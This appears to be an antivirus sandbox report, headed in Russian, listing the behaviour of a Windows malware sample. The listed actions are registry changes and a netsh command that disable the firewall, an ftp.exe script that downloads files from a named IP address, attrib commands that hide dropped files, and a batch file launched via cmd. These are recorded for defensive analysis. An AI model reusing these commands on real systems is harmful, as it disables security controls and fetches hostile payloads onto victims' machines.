Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- '<SYSTEM32>\ftp.exe' -s:update.txt -A 117.218.103.161
- '<SYSTEM32>\attrib.exe' +S +H +R Win_update.jpeg
- '<SYSTEM32>\attrib.exe' +S +H +R update.txt
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\Win_update.bat" "
- '<SYSTEM32>\netsh.exe' firewall set opmode disable
- <Текущая директория>\update.txt
- %TEMP%\1.tmp\Win_update.bat
- <Текущая директория>\update.txt
- 'localhost':1037
- '11#.#18.103.161':21
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'